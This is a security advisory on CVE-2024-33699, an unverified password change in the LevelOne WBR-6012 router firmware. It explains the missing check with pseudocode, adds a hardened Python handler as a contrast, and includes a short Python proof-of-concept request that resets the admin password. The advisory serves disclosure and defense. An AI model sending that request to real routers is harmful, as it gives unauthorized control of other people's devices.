CVE-2024-33699
The LevelOne WBR-6012 router’s web application has a vulnerability in its firmware version R0.40e6, allowing attackers to change the administrator password and gain higher privileges without the current password.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6012 R0.40e6
WBR-6012 - https://us.level1.com/products/wbr-6012
9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-620 - Unverified Password Change
The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.
Using the underlying web application logic, an attacker may change the password without knowledge of the original password.
This requires authentication, but that may be bypassed by exploiting other vulnerabilities (CSRF, IP spoofing).
The function located at 0x800e6944 handles password changes via HTTP. The existing password is only checked when it is supplied in the ‘PA’ HTTP POST parameter. Omitting the ‘PA’ parameter from the change-password request bypasses the check and allows a password change without knowledge of the current password.
For clarity, the pseudocode below is a highly simplified representation of the change-password logic and has been stripped of unrelated functionality that exists on the device.
ADMIN_PASSWORD = 'admin'   /// global for admin password, 'admin' is the default
new_password = Pa          /// value from HTTP POST param Pa

/// if the 'PA' parameter is present, check it before allowing the password change
if (http_param == 'PA') {
    admin_password = PA    /// value from HTTP POST param PA
    /// check if the provided admin password is the correct admin password
    if (check_password(admin_password)) {
        /// if the admin password is correct, change the admin password
        change_password(new_password)
    }
}
/// if the Pa param is present, even when PA is not present
else if (http_param == 'Pa') {
    /// check that the new password is different from the current password
    if (new_password != ADMIN_PASSWORD) {
        /// NOTE THE MISSING PASSWORD CHECK HERE
        /// change the admin password
        change_password(new_password)
    }
}
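For contrast, the following is an added example (not the device firmware and not Talos code) of how a change-password handler avoids CWE-620: the current password is always required and always verified, so omitting the field fails the request instead of skipping the check. The parameter names ‘PA’ (current password) and ‘Pa’ (new password) are taken from the advisory; the AdminCredential store, the salted PBKDF2 hashing and the handle_password_change function are assumptions made for this example.

```python
import hashlib
import hmac
import os


class AdminCredential:
    """Salted hash of the admin password (constructed in-memory store for this example)."""

    def __init__(self, password: str) -> None:
        self.salt = os.urandom(16)
        self.digest = self._hash(password, self.salt)

    @staticmethod
    def _hash(password: str, salt: bytes) -> bytes:
        # PBKDF2-HMAC-SHA256; the iteration count is an assumption for this example
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def verify(self, candidate: str) -> bool:
        # constant-time comparison so a wrong guess is not distinguishable by timing
        return hmac.compare_digest(self.digest, self._hash(candidate, self.salt))

    def rotate(self, new_password: str) -> None:
        self.salt = os.urandom(16)
        self.digest = self._hash(new_password, self.salt)


def handle_password_change(params: dict, cred: AdminCredential) -> tuple:
    """Return (HTTP status, message) for an already parsed POST body.

    'PA' is the current password and 'Pa' the new one, as on the device;
    the handler itself is a hypothetical hardened version, not the firmware's.
    """
    current = params.get("PA")
    new = params.get("Pa")
    # CWE-620 fix: a missing current password is a failed check, never a skipped one
    if current is None or new is None:
        return 400, "current and new password are both required"
    if not cred.verify(current):
        return 403, "current password is incorrect"
    if new == current:
        return 400, "new password must differ from the current password"
    cred.rotate(new)
    return 200, "password changed"


if __name__ == "__main__":
    cred = AdminCredential("admin")
    # constructed request bodies: the advisory's shape (no 'PA'), a wrong 'PA', and a valid change
    for body in ({"test": "test", "Pa": "test"},
                 {"PA": "wrong", "Pa": "test"},
                 {"PA": "admin", "Pa": "test"}):
        print(body, "->", handle_password_change(body, cred))
```

The request shape from the advisory (a dummy parameter plus ‘Pa’ only) is rejected with 400 and the stored credential is untouched; only a request carrying the correct current password rotates it.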
The PoC below will change the password to ‘test’ if sent from an IP with an authenticated session. The web app does not validate that the password-change request comes from someone who knows the existing password. A minimum of 2 HTTP POST parameters is required, but only the “Pa” (new password) parameter is used.
import requests

url = 'http://192.168.1.1/cgi-bin/pass'
data = {
    'test': 'test',  # dummy param
    'Pa': 'test',    # new password
}
response = str(requests.post(url, data=data).status_code)
print(response)
2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release
Discovered by Patrick DeSantis and Francesco Benvenuto of Cisco Talos.